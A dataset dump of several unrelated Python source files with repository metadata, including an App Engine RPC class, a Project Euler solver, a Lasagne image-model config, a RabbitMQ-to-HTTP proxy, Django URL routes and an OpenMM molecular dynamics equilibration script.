def service(self):
"""Return the service name."""
return self.__service
@property
def method(self):
"""Return the method name."""
return self.__method
@property
def deadline(self):
"""Return the deadline, if set explicitly (otherwise None)."""
return self.__rpc.deadline
def __get_callback(self):
"""Return the callback attribute, a function without arguments.
This attribute can also be assigned to. For example, the
following code calls some_other_function(rpc) when the RPC is
complete:
rpc = service.create_rpc()
rpc.callback = lambda: some_other_function(rpc)
service.make_method_call(rpc)
rpc.wait()
"""
return self.__rpc.callback
def __set_callback(self, callback):
"""Set the callback function."""
self.__rpc.callback = callback
callback = property(__get_callback, __set_callback)
@property
def request(self):
"""Return the request protocol buffer object."""
return self.__rpc.request
@property
def response(self):
"""Return the response protocol buffer object."""
return self.__rpc.response
@property
def state(self):
"""Return the RPC state.
Possible values are attributes of apiproxy_rpc.RPC: IDLE, RUNNING,
FINISHING.
"""
return self.__rpc.state
@property
def get_result_hook(self):
"""Return the get-result hook function."""
return self.__get_result_hook
@property
def user_data(self):
"""Return the user data for the hook function."""
return self.__user_data
def make_call(self, method, request, response,
get_result_hook=None, user_data=None):
"""Initiate a call.
Args:
method: The method name.
request: The request protocol buffer.
response: The response protocol buffer.
get_result_hook: Optional get-result hook function. If not None,
this must be a function with exactly one argument, the RPC
object (self). Its return value is returned from get_result().
user_data: Optional additional arbitrary data for the get-result
hook function. This can be accessed as rpc.user_data. The
type of this value is up to the service module.
This function may only be called once per RPC object. It sends
the request to the remote server, but does not wait for a
response. This allows concurrent execution of the remote call and
further local processing (e.g., making additional remote calls).
Before the call is initiated, the precall hooks are called.
"""
assert self.__rpc.state == apiproxy_rpc.RPC.IDLE, repr(self.state)
self.__method = method
self.__get_result_hook = get_result_hook
self.__user_data = user_data
apiproxy.GetPreCallHooks().Call(
self.__service, method, request, response, self.__rpc)
self.__rpc.MakeCall(self.__service, method, request, response)
def wait(self):
"""Wait for the call to complete, and call callbacks.
This is the only time callback functions may be called. (However,
note that check_success() and get_result() call wait().) Waiting
for one RPC may cause callbacks for other RPCs to be called.
Callback functions may call check_success() and get_result().
Callbacks are called without arguments; if a callback needs access
to the RPC object a Python nested function (a.k.a. closure) or a
bound may be used. To facilitate this, the callback may be
assigned after the RPC object is created (but before make_call()
is called).
Note: don't confuse callbacks with get-result hooks or precall
and postcall hooks.
"""
assert self.__rpc.state != apiproxy_rpc.RPC.IDLE, repr(self.state)
if self.__rpc.state == apiproxy_rpc.RPC.RUNNING:
self.__rpc.Wait()
assert self.__rpc.state == apiproxy_rpc.RPC.FINISHING, repr(self.state)
def check_success(self):
"""Check for success of the RPC, possibly raising an exception.
This function should be called at least once per RPC. If wait()
hasn't been called yet, it is called first. If the RPC caused
an exceptional condition, an exception will be raised here.
The first time check_success() is called, the postcall hooks
are called.
"""
self.wait()
self.__rpc.CheckSuccess()
if not self.__postcall_hooks_called:
self.__postcall_hooks_called = True
apiproxy.GetPostCallHooks().Call(self.__service, self.__method,
self.request, self.response, self.__rpc)
def get_result(self):
"""Get the result of the RPC, or possibly raise an exception.
This implies a call to check_success(). If a get-result hook was
passed to make_call(), that hook is responsible for calling
check_success(), and the return value of the hook is returned.
Otherwise, check_success() is called directly and None is
returned.
"""
if self.__get_result_hook is None:
self.check_success()
return None
else:
return self.__get_result_hook(self)
def GetDefaultAPIProxy():
try:
runtime = __import__('google.appengine.runtime', globals(), locals(),
['apiproxy'])
return APIProxyStubMap(runtime.apiproxy)
except (AttributeError, ImportError):
return APIProxyStubMap()
apiproxy = GetDefaultAPIProxy()
| [
"hylom@silver.local"
] | hylom@silver.local |
4cfe8f1a65903b6bafb4740fff874b3e4108493f | ab8b338fe5c7b522241feb4f7bb71950509c7a06 | /python/problem26.py | f1f67ebd383b6069f831fa61e3e8acb5df4e4932 | [] | no_license | amomin/proje | 5d111fa413a493809356cafecb3a2c017bc29f21 | 480f08b028cd56eb99a1c3426508d69ffe578f05 | refs/heads/master | 2016-09-06T18:18:28.652006 | 2015-02-28T20:26:28 | 2015-02-28T20:26:28 | 24,754,823 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,067 | py | def repFraction(d):
# returns a list representing the decimal expansion of 1/d
r_0 = 1
k = 1
digitList = []
remainderList = [1]
doRepeat = 1
while (doRepeat == 1):
while (d > r_0*10**k):
k = k+1
digitList.append(0)
remainderList.append('s')
# Now d <= r_0*10^^k
x = r_0*10**k/d
rem = r_0*10**k - x*d
if (rem == 0):
doRepeat = 0
digitList.append(x)
remainderList.append(rem)
return digitList, remainderList
elif (rem in remainderList):
doRepeat = 0
digitList.append(x)
digitList.append('r')
remainderList.append(rem)
return digitList, remainderList
else:
digitList.append(x)
remainderList.append(rem)
r_0 = rem
k = 1
def lenRepeat(z):
lengthList = []
# z = repFraction(i)
z0 = z[0]
z1 = z[1]
count = 0
if z0.pop() != 'r':
# lengthList.append(count)
return 0
else:
lastRem = z1.pop()
count = 1
while z1.pop() != lastRem:
count = count+1
return count
# lengthList.append(count)
x = []
for i in range(2,1000):
x= repFraction(i)
# print x
if lenRepeat(x) == 982:
print i
| [
"amomin@evermight.com"
] | amomin@evermight.com |
2d283c29a7787686b4bcf6f95235d830ff3d30c7 | 2359121ebcebba9db2cee20b4e8f8261c5b5116b | /configs/d4_16.py | 9cb1b39825a598c084e3817351bc0cf9c8b9f6e7 | [] | no_license | EliasVansteenkiste/plnt | 79840bbc9f1518c6831705d5a363dcb3e2d2e5c2 | e15ea384fd0f798aabef04d036103fe7af3654e0 | refs/heads/master | 2021-01-20T00:34:37.275041 | 2017-07-20T18:03:08 | 2017-07-20T18:03:08 | 89,153,531 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,394 | py |
#config a6 is equivalent to a5, except the normalization
import numpy as np
import lasagne as nn
from collections import namedtuple
from functools import partial
import lasagne.layers.dnn as dnn
import lasagne
import theano.tensor as T
import data_transforms
import data_iterators
import pathfinder
import utils
import app
import nn_planet
restart_from_save = None
rng = np.random.RandomState(42)
# transformations
p_transform = {'patch_size': (256, 256),
'channels': 4,
'n_labels': 1,
'n_feat': 64,
'label_id': 16}
#only lossless augmentations
p_augmentation = {
'rot90_values': [0,1,2,3],
'flip': [0, 1]
}
# data preparation function
def data_prep_function_train(x, p_transform=p_transform, p_augmentation=p_augmentation, **kwargs):
x = np.array(x)
x = np.swapaxes(x,0,2)
x = x / 255.
x = x.astype(np.float32)
x = data_transforms.lossless(x, p_augmentation, rng)
return x
def data_prep_function_valid(x, p_transform=p_transform, **kwargs):
x = np.array(x)
x = np.swapaxes(x,0,2)
x = x / 255.
x = x.astype(np.float32)
return x
def label_prep_function(label):
return label[p_transform['label_id']]
# data iterators
# 0.18308259
batch_size = 3
pos_batch_size = 2
neg_batch_size = 1
assert batch_size == (pos_batch_size+neg_batch_size)
nbatches_chunk = 1
chunk_size = batch_size * nbatches_chunk
folds = app.make_stratified_split(no_folds=5)
print len(folds)
train_ids = folds[0] + folds[1] + folds[2] + folds[3]
valid_ids = folds[4]
all_ids = folds[0] + folds[1] + folds[2] + folds[3] + folds[4]
bad_ids = []
train_ids = [x for x in train_ids if x not in bad_ids]
valid_ids = [x for x in valid_ids if x not in bad_ids]
test_ids = np.arange(40669)
test2_ids = np.arange(20522)
train_data_iterator = data_iterators.DiscriminatorDataGenerator(dataset='train-jpg',
batch_size=batch_size,
pos_batch_size=pos_batch_size,
label_id = p_transform['label_id'],
img_ids = train_ids,
p_transform=p_transform,
data_prep_fun = data_prep_function_train,
label_prep_fun = label_prep_function,
rng=rng,
full_batch=True, random=True, infinite=True)
feat_data_iterator = data_iterators.DataGenerator(dataset='train-jpg',
batch_size=batch_size,
pos_batch_size=pos_batch_size,
img_ids = train_ids,
p_transform=p_transform,
data_prep_fun = data_prep_function_train,
label_prep_fun = label_prep_function,
rng=rng,
full_batch=False, random=False, infinite=False)
valid_data_iterator = data_iterators.DiscriminatorDataGenerator(dataset='train-jpg',
batch_size=batch_size,
pos_batch_size=pos_batch_size,
label_id = p_transform['label_id'],
img_ids = valid_ids,
p_transform=p_transform,
data_prep_fun = data_prep_function_train,
label_prep_fun = label_prep_function,
rng=rng,
full_batch=True, random=False, infinite=False)
test_data_iterator = data_iterators.DataGenerator(dataset='test-jpg',
batch_size=batch_size,
pos_batch_size=pos_batch_size,
img_ids = test_ids,
p_transform=p_transform,
data_prep_fun = data_prep_function_valid,
label_prep_fun = label_prep_function,
rng=rng,
full_batch=False, random=False, infinite=False)
test2_data_iterator = data_iterators.DataGenerator(dataset='test2-jpg',
batch_size=batch_size,
pos_batch_size=pos_batch_size,
img_ids = test2_ids,
p_transform=p_transform,
data_prep_fun = data_prep_function_valid,
label_prep_fun = label_prep_function,
rng=rng,
full_batch=False, random=False, infinite=False)
nchunks_per_epoch = train_data_iterator.nsamples / chunk_size
max_nchunks = nchunks_per_epoch * 40
validate_every = int(0.1 * nchunks_per_epoch)
save_every = int(1. * nchunks_per_epoch)
learning_rate_schedule = {
0: 5e-4,
int(max_nchunks * 0.4): 2e-4,
int(max_nchunks * 0.6): 1e-4,
int(max_nchunks * 0.7): 5e-5,
int(max_nchunks * 0.8): 2e-5,
int(max_nchunks * 0.9): 1e-5
}
# model
conv = partial(dnn.Conv2DDNNLayer,
filter_size=3,
pad='same',
W=nn.init.Orthogonal(),
nonlinearity=nn.nonlinearities.very_leaky_rectify)
max_pool = partial(dnn.MaxPool2DDNNLayer,
pool_size=2)
drop = lasagne.layers.DropoutLayer
dense = partial(lasagne.layers.DenseLayer,
W=lasagne.init.Orthogonal(),
nonlinearity=lasagne.nonlinearities.very_leaky_rectify)
def inrn_v2(lin, last_layer_nonlin = lasagne.nonlinearities.rectify):
n_base_filter = 32
l1 = conv(lin, n_base_filter, filter_size=1)
l2 = conv(lin, n_base_filter, filter_size=1)
l2 = conv(l2, n_base_filter, filter_size=3)
l3 = conv(lin, n_base_filter, filter_size=1)
l3 = conv(l3, n_base_filter, filter_size=3)
l3 = conv(l3, n_base_filter, filter_size=3)
l = lasagne.layers.ConcatLayer([l1, l2, l3])
l = conv(l, lin.output_shape[1], filter_size=1)
l = lasagne.layers.ElemwiseSumLayer([l, lin])
l = lasagne.layers.NonlinearityLayer(l, nonlinearity= last_layer_nonlin)
return l
def inrn_v2_red(lin):
# We want to reduce our total volume /4
den = 16
nom2 = 4
nom3 = 5
nom4 = 7
ins = lin.output_shape[1]
l1 = max_pool(lin)
l2 = conv(lin, ins // den * nom2, filter_size=3, stride=2)
l3 = conv(lin, ins // den * nom2, filter_size=1)
l3 = conv(l3, ins // den * nom3, filter_size=3, stride=2)
l4 = conv(lin, ins // den * nom2, filter_size=1)
l4 = conv(l4, ins // den * nom3, filter_size=3)
l4 = conv(l4, ins // den * nom4, filter_size=3, stride=2)
l = lasagne.layers.ConcatLayer([l1, l2, l3, l4])
return l
def feat_red(lin):
# We want to reduce the feature maps by a factor of 2
ins = lin.output_shape[1]
l = conv(lin, ins // 2, filter_size=1)
return l
def build_model():
l_in = nn.layers.InputLayer((None, p_transform['channels'],) + p_transform['patch_size'])
l_target = nn.layers.InputLayer((None,))
l = conv(l_in, 64)
l = inrn_v2_red(l)
l = inrn_v2(l)
l = inrn_v2_red(l)
l = inrn_v2(l)
l = inrn_v2_red(l)
l = inrn_v2(l)
# l = inrn_v2_red(l)
# l = inrn_v2(l)
# l = inrn_v2_red(l)
# l = inrn_v2(l)
l = drop(l)
l_neck = nn.layers.GlobalPoolLayer(l)
l_out = nn.layers.DenseLayer(l_neck, num_units=p_transform['n_feat'],
W=nn.init.Orthogonal(),
nonlinearity=nn.nonlinearities.identity)
return namedtuple('Model', ['l_in', 'l_out', 'l_neck', 'l_target'])(l_in, l_out, l_neck, l_target)
def build_objective(model, deterministic=False, epsilon=1.e-7):
features= nn.layers.get_output(model.l_out, deterministic=deterministic)
targets = T.cast(T.flatten(nn.layers.get_output(model.l_target)), 'int32')
#feat = T.nnet.nnet.sigmoid(features)
feat = features
df = T.sum(abs(feat.dimshuffle(['x',0,1]) - feat.dimshuffle([0,'x',1])), axis=2)
d_p = df[0,1]
d_n1 = df[0,2]
d_n2 = df[1,2]
d_n = T.min(T.stack([d_n1, d_n2]))
margin = np.float32(1.)
zero = np.float32(0.)
triplet_dist_hinge = T.max(T.stack([margin + d_p - d_n, zero]))
return triplet_dist_hinge
def build_objective2(model, deterministic=False, epsilon=1.e-7):
features= nn.layers.get_output(model.l_out, deterministic=deterministic)
targets = T.cast(T.flatten(nn.layers.get_output(model.l_target)), 'int32')
#feat = T.nnet.nnet.sigmoid(features)
feat = features
df = T.sum(abs(feat.dimshuffle(['x',0,1]) - feat.dimshuffle([0,'x',1])), axis=2)
d_p = df[0,1]
d_n1 = df[0,2]
d_n2 = df[1,2]
d_n = T.min(T.stack([d_n1, d_n2]))
margin = np.float32(1.)
zero = np.float32(0.)
triplet_dist_hinge = T.max(T.stack([margin + d_p - d_n, zero]))
return triplet_dist_hinge
# features= nn.layers.get_output(model.l_out, deterministic=deterministic)
# targets = T.cast(T.flatten(nn.layers.get_output(model.l_target)), 'int32')
# #feat = T.nnet.nnet.sigmoid(features)
# feat = features
# df = T.mean((feat.dimshuffle(['x',0,1]) - feat.dimshuffle([0,'x',1]))**2, axis=2)
# d_p = df[0,1]
# d_n1 = df[0,2]
# d_n2 = df[1,2]
# d_n = T.min(T.stack([d_n1, d_n2]))
# margin = np.float32(1.)
# zero = np.float32(0.)
# triplet_dist_hinge = T.max(T.stack([margin + d_p - d_n, zero]))
# return d_n
def sigmoid(x):
s = 1. / (1. + np.exp(-x))
return s
def score(gts, feats):
feats = np.vstack(feats)
gts = np.vstack(gts)
gts = np.int32(gts)
feats = sigmoid(feats)
df = np.mean(np.abs(feats[None,:,:] - feats[:,None,:]), axis=2)
gt = gts > 0.5
gt = gt.flatten()
non_gt = gts < 0.5
non_gt = non_gt.flatten()
df_pp = df[gt]
df_pp = df_pp[:,gt]
df_np = df[non_gt, :]
df_np = df_np[:, gt]
preds_p = 1-np.mean(df_pp,axis=1)
preds_n = 1-np.mean(df_np,axis=1)
treshold = 0.5
tp = np.sum(preds_p>treshold)
fp = np.sum(preds_n>treshold)
fn = np.sum(preds_p<treshold)
return np.array([tp, fp, fn])
test_score = score
def build_updates(train_loss, model, learning_rate):
updates = nn.updates.adam(train_loss, nn.layers.get_all_params(model.l_out, trainable=True), learning_rate)
return updates
| [
"Elias.Vansteenkiste@gmail.com"
] | Elias.Vansteenkiste@gmail.com |
192d6fe790c62907ebf8671fffb1cdeac974733b | 12508b7481a5910e7f5568c99afa3f1e1d487066 | /catkin_ws/build/darknet_ros_msgs/catkin_generated/generate_cached_setup.py | 7134d326bd259fe991c20c3ee337778e524273c8 | [] | no_license | lkj10/ros_study | 1aabc439b5d17d19ce623a8bce6d5d9645d3f238 | a2ada1854fff366338b5906709b7efb098332212 | refs/heads/master | 2023-06-05T15:01:43.511785 | 2021-06-18T08:06:51 | 2021-06-18T08:06:51 | 373,006,597 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,326 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in '/home/user/catkin_ws/devel;/opt/ros/melodic'.split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/user/catkin_ws/devel/.private/darknet_ros_msgs/env.sh')
output_filename = '/home/user/catkin_ws/build/darknet_ros_msgs/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
# print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"lee_10_@naver.com"
] | lee_10_@naver.com |
a428a98e63d7caddab5315749f13cd186356343f | e054c2961fadf721fda9f48946862b7a0eb68448 | /rabbitmq_to_http_proxy.py | 288337a81ac08c08b19cfc82f4e86ae17b3fc650 | [
"MIT"
] | permissive | tomasrasymas/rabbitmq-http-proxy | 96587ee12bd01b7d1fa247f046683f37581ef4e6 | d475716e59f4dccf24d67e96adb5ec245f74c728 | refs/heads/master | 2022-12-17T21:53:28.877333 | 2018-02-19T15:58:11 | 2018-02-19T15:58:11 | 122,070,949 | 2 | 0 | MIT | 2022-12-08T00:52:27 | 2018-02-19T14:05:15 | Python | UTF-8 | Python | false | false | 2,992 | py | import json
import requests
from argparse import ArgumentParser
from rmq_consumer import RmqConsumer
def str_to_dict(string):
try:
return json.loads(string)
except:
return None
class RabbitMqToHttpProxy(RmqConsumer):
def __init__(self, url, exchange, queue, routing_key='#', queue_type='topic', durable=True, endpoint=None,
verbose=False, prefetch_count=1000):
RmqConsumer.__init__(self, url=url, exchange=exchange, queue=queue,
routing_key=routing_key, queue_type=queue_type, durable=durable,
prefetch_count=prefetch_count)
self.endpoint = endpoint
self.verbose = verbose
self.headers = {'content-type': 'application/json'}
def on_message(self, channel, method, properties, body):
msg = str_to_dict(body)
if msg:
if self.verbose:
print(msg, end='\t' if self.endpoint else '\n')
if self.endpoint:
r = requests.post(self.endpoint, data=json.dumps(msg), headers=self.headers)
if self.verbose:
print(r.status_code, r.reason)
if r.status_code not in (200, 201):
self.nacknowledge_message(method.delivery_tag)
return
self.acknowledge_message(method.delivery_tag)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('-a', '--endpoint', dest='endpoint', type=str, required=False, help='Endpoint url to post')
parser.add_argument('-u', '--url', dest='url', type=str, required=True, help='Url of RabbitMQ server')
parser.add_argument('-e', '--exchange', dest='exchange', type=str, required=True, help='Exchange to bind')
parser.add_argument('-q', '--queue', dest='queue', type=str, required=True, help='Name of queue to consume')
parser.add_argument('-p', '--prefetch_count', dest='prefetch_count', type=int, required=False,
default=1000, help='Number of prefetch count')
parser.add_argument('-r', '--routing_key', dest='routing_key', type=str, required=True,
help='Routing key')
parser.add_argument('-t', '--queue_type', dest='queue_type', type=str, required=False, help='Queue type',
default='topic')
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', required=False,
default=False, help='Verbose')
args = parser.parse_args()
if args.verbose:
print('*' * 50)
for i in vars(args):
print(str(i) + ' - ' + str(getattr(args, i)))
print('*' * 50)
proxy = RabbitMqToHttpProxy(url=args.url, exchange=args.exchange, queue=args.queue,
routing_key=args.routing_key, queue_type=args.queue_type,
endpoint=args.endpoint, verbose=args.verbose, prefetch_count=args.prefetch_count)
proxy.run() | [
"tomas@dutrys.com"
] | tomas@dutrys.com |
0d36f928a95de75fd5dda09a45c0dd309b68f161 | 4504b178f456cd81283d0ebd25e5740a3a7062e5 | /correos y usuarios/NodoCabecera.py | 51262c9cbca9cd78e6a396ce318167cda01d0d4d | [] | no_license | spartan0614/Users | 22e398b539ee71f858264d4c637a11a89fa5732c | 0bbb7fc305036a0cc13be24b0e74050116f7b0f3 | refs/heads/master | 2021-01-21T10:52:44.778104 | 2017-03-05T22:28:55 | 2017-03-05T22:28:55 | 83,497,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | class NodoCabecera(object):
def __init__(self, x):
self.x = x
columna = ListaVertical()
self.siguiente = None
self.anterior = None | [
"62442joss@gmail.com"
] | 62442joss@gmail.com |
ca0f4f3aaa6d703204567dde081e416ee6d3b5b8 | 785ff68f2557422a3ad4bee9e8a9459ffe1a9128 | /src/dj_asana/apps.py | ff9026cb87bbf8e60d847d2c14990d4cdd7638a0 | [] | no_license | Saumyaoec/Todo-asana-new- | d42f7e87166ec0aff81e3f93e29dfeae6614b7cf | ee9ea8b30037ddb0d51b08a63dbca880fd824206 | refs/heads/master | 2023-08-12T00:27:48.062101 | 2021-10-05T07:47:53 | 2021-10-05T07:47:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | from django.apps import AppConfig
class DjAsanaConfig(AppConfig):
name = 'src.dj_asana'
verbose_name = 'Asana'
| [
"adil.e.amirov@ya.ru"
] | adil.e.amirov@ya.ru |
6d08539928c9747db4f35f25def1d75569fdf93d | 94f4bb0f6e43b2eb2f1bdb284a580b76121fa9af | /309.py | c3f3545e6d6ca9a6f20a760dd5959d614480e83e | [] | no_license | huosan0123/leetcode-py | f1ec8226bae732369d4e1989b99ab0ba4b4061c4 | 22794e5e80f534c41ff81eb40072acaa1346a75c | refs/heads/master | 2021-01-25T11:48:17.365118 | 2019-09-12T15:45:34 | 2019-09-12T15:45:34 | 93,934,297 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | class Solution(object):
def maxProfit(self, prices):
"""
:type prices: List[int]
:rtype: int
copied.
"""
cash0_pre, cash0, hold1 = 0, 0, float("-inf") # initialization is key!
for price in prices:
old = cash0
cash0 = max(cash0, hold1 + price)
hold1 = max(hold1, cash0_pre - price)
cash0_pre = old
return cash0
| [
"lc_286@126.com"
] | lc_286@126.com |
c0a323d6563dda7c8ac2b49d827352f6379ba03d | caed98915a93639e0a56b8296c16e96c7d9a15ab | /DP/stocks/Stock_II.py | 5ec46fcd78856a48fdfcf6ebdb61c059e7384e15 | [] | no_license | PiyushChandra17/365-Days-Of-LeetCode | 0647787ec7e8f1baf10b6bfc687bba06f635838c | 7e9e9d146423ca2c5b1c6a3831f21dd85fa376d5 | refs/heads/main | 2023-02-13T10:41:36.110303 | 2021-01-17T11:58:51 | 2021-01-17T11:58:51 | 319,974,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | class Solution:
def maxProfit(self, prices: List[int]) -> int:
return sum(max(prices[i+1]-prices[i],0)for i in range(len(prices)-1))
| [
"noreply@github.com"
] | PiyushChandra17.noreply@github.com |
6d50dfec0241037b9962a1323d3b563449edf513 | fd0d0c8ecfa0da47cfcac35a6ffb4537235d3702 | /eportal/urls.py | f300d964010587be10fe559dd997868d511faae0 | [] | no_license | mohandutt134/eportal | 16b0e69a668837a854ef410e1224eaac172bccf3 | e39d004061b64bfb1016fbbb7aabc60c92b78cf3 | refs/heads/master | 2021-07-25T21:47:38.022787 | 2019-04-18T15:21:12 | 2019-04-18T15:21:12 | 254,024,373 | 0 | 0 | null | 2021-06-10T22:44:39 | 2020-04-08T08:06:52 | HTML | UTF-8 | Python | false | false | 1,789 | py | from django.contrib import admin
from django.conf.urls import *
from student import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^attendance/', include('attendance.urls')),
url(r'^quiz/', include('quiz.urls')),
url(r'^notification/', include('notification.urls')),
url(r'^accounts/', include('accounts.urls')),
url(r'^$', views.home, name='home'),
url(r'^dashboard$', views.dashboard, name='dashboard'),
url(r'^contact$', views.contactview, name='contact'),
url(r'^faculty$', views.faculties, name='faculty'),
url(r'^about$', views.about, name='about'),
url(r'^allcourses$', views.allcourses, name='allcourses'),
url(r'^courses/(?P<id>[0-9A-Za-z_\-]+)$', views.course, name='course'),
url(r'^courses$', views.courses, name='courses'),
url(r'^profile$', views.profile, name='profile'),
url(r'^profile/(?P<username>[0-9A-Za-z_\-\.]+)$', views.pprofile, name='pprofile'),
url(r'^users/(?P<username>[0-9A-Za-z_\-\.]+)/$', views.pprofile, name='pprofile'),
# # url(r'^profile_edit/$', 'profile_edit', name='profile_edit'),
# # url('^inbox/notifications/', include(notifications.urls)),
# url(r'^mail$', 'mail'),
# url(r'^change/$', 'changePassword', name='change'),
#
# url(r'^courses/(?P<id>[0-9A-Za-z_\-]+)/addmaterial$', 'add_material', name='add_material'),
# url(r'^courseinfo/(?P<id>[0-9A-Za-z_\-]+)$', 'course_info', name='course_info'),
# url(r'^courseregister/$', 'course_register', name='course_register'),
# # (r'^ckeditor/', include('ckeditor.urls')),
url(r'^addann/$', views.add_ann, name='addann'),
url(r'^addvideo/$', views.add_video, name='addvideo'),
#
# url(r'^addsyllabus/(?P<id>[0-9A-Za-z_\-]+)$$', 'add_syllabus', name='addsyllabus'),
]
| [
"vibhanshu86@gmail.com"
] | vibhanshu86@gmail.com |
d322b77825b27b31a958a4e43548fe58c0b1e526 | 9e0796e19634e191cfa08f6244305cf85454d6b0 | /core/common_data.py | fe10de394e8e2b3a532804863d26c2a04c1f9e40 | [
"BSD-2-Clause"
] | permissive | tanshinepan/interface_auto_test | 53a3094fca4f54878813cef8f4519dcf301ee2a0 | 9c2b177bd2ad60b5e1e8b1f3c7e06d6a534e9c00 | refs/heads/master | 2022-07-13T03:52:15.739207 | 2020-05-13T10:38:46 | 2020-05-13T10:38:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 581 | py | #coding=utf-8
"""
存放用户的数据
全局变量
用例集变量
用例变量
"""
#全局变量
global_vars={}
#用例集变量,每个用例集运行时会初始化
testsuite_vars={}
#用例变量,每个用例执行时会初始化
testcase_vars={}
#api template的模板集合
api_template_dic = {}
#testsuite测试用例集数据保存的集合
testsuite_dic = {}
#testsuite测试用例集数据保存的集合
testsuite_list = []
#测试用例数据
testcase_list=[]
#当前执行的测试用例集名字,其实就是用例集的文件名
now_testsuite_name= None | [
"huaizheng.xie@shuyun.com"
] | huaizheng.xie@shuyun.com |
5acd1660ba5455bc1084047dc66d3485dde5efb6 | fb9c24e1e27c930881f54a0d609683983c726cec | /main/migrations/0032_auto_20210326_1139.py | 9fac8da7459eaeeeeff9e17fe2d1e1408b18388e | [] | no_license | Safintim/flower-shop | 6ba28f3f82912bcedd8c7d1e259557cda729410e | 92c0b7488b5370fc5512d6ce85f0e76a2a55bdbd | refs/heads/master | 2023-04-08T18:48:43.866959 | 2021-04-14T10:18:06 | 2021-04-14T10:18:06 | 254,976,051 | 0 | 0 | null | 2020-06-06T08:55:36 | 2020-04-11T23:50:58 | Python | UTF-8 | Python | false | false | 371 | py | # Generated by Django 3.1.7 on 2021-03-26 11:39
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0031_auto_20210326_1118'),
]
operations = [
migrations.DeleteModel(
name='Callback',
),
migrations.DeleteModel(
name='Configuration',
),
]
| [
"timurtlt96@mail.ru"
] | timurtlt96@mail.ru |
d023b130f65e19950fb31e48e224df3d98fde7be | 97b5e5b1f634012ac1a0552e9ebf9f23881c9bb7 | /openmm_equilibration.py | 725168f98e652b9efc6b1e270e8bc449594dc628 | [
"MIT"
] | permissive | mikeoconnor0308/HTMD-Adaptive-OpenMM | ce5884b090b72369224df64b1849a98d6f28eeaa | 0a994b1a2c0f48a1c7653e0042716799430e5c98 | refs/heads/master | 2021-05-14T15:37:15.167517 | 2018-01-02T14:22:21 | 2018-01-02T14:22:21 | 115,997,346 | 2 | 2 | null | 2018-01-02T11:34:45 | 2018-01-02T09:19:49 | Python | UTF-8 | Python | false | false | 3,704 | py | """
Loads a pdb file (+ dcd file if required) minimizes and equilibrates using Amber10 forcefield & implicit solvent.
It also outputs an AceMD .coor file for compatibility with HTMD's adaptive sampling.
For follow up use in adaptive sampling in HTMD.
"""
#/usr/bin/env python3
from __future__ import print_function
from simtk.openmm import app
import simtk.openmm as mm
from simtk import unit
import argparse
import time
import sys
import os
import mdtraj
import mdtraj.reporters
parser = argparse.ArgumentParser(description="Run an OpenMM Simulation")
parser.add_argument('topology', type=str, help='PDB file to run simulation from')
parser.add_argument('-c', '--coords', type=str, help='DCD file to load coordinates from')
parser.add_argument('-f', '--frame', type=int, help='DCD frame to load coordinates from', default=0)
parser.add_argument('-T', '--temperature', type=float, help='Temperature for simulation', default=300)
parser.add_argument('-teq', '--equilibration_time', type=float,
help='Time (in ns) to equilibrate system', default=2)
parser.add_argument('-ts', '--time_step', type=float, help='Time step (in fs)', default=1.0)
parser.add_argument('-fr', '--friction', type=float, help='Friction coefficent (1/ps)', default=1.0)
parser.add_argument('-o', '--output_path', type=str, help='Path to output trajectory files to. Defaults to path of input file', default="")
args = parser.parse_args()
temp = args.temperature
t_equil = args.equilibration_time
fric = args.friction
pdb_str = args.topology
# load pdb from file using MDTraj
if args.coords:
traj = mdtraj.load_dcd(args.coords, top=pdb_str)
else:
traj = mdtraj.load(pdb_str)
# add traj argument to set unit cell information.
topology = traj.topology.to_openmm(traj)
forcefield = app.ForceField('amber10.xml', 'amber10_obc.xml')
print("Creating model for pdb {} from frame {}".format(pdb_str, args.frame))
modeller = app.Modeller(topology, traj.openmm_positions(args.frame))
system = forcefield.createSystem(modeller.topology, nonbondedMethod=app.CutoffPeriodic,
nonbondedCutoff=2.0 * unit.nanometers, constraints=app.HBonds)
timestep = args.time_step * unit.femtoseconds
integrator = mm.LangevinIntegrator(temp * unit.kelvin, fric / unit.picoseconds,
timestep)
integrator.setConstraintTolerance(0.00001)
platform = mm.Platform.getPlatformByName('CUDA')
simulation = app.Simulation(modeller.topology, system, integrator, platform)
simulation.context.setPositions(modeller.positions)
print("minimizing...")
simulation.minimizeEnergy()
if args.output_path != "":
output_path = args.output_path + "/"
else:
output_path = os.path.splitext(pdb_str)[0]
simulation.context.setVelocitiesToTemperature(temp * unit.kelvin)
# equilibrate
print("Equilibrating ...")
nsteps = int(t_equil * unit.nanoseconds / timestep)
simulation.reporters.append(app.StateDataReporter(sys.stdout, 1000, step=True, time=True, progress=True,
potentialEnergy=True, temperature=True, remainingTime=True,
speed=True, totalSteps=nsteps, separator=','))
simulation.step(nsteps)
positions = simulation.context.getState(getPositions=True).getPositions()
pdb_out = '{}/input.pdb'.format(output_path)
app.PDBFile.writeFile(simulation.topology, positions, open(pdb_out, 'w'))
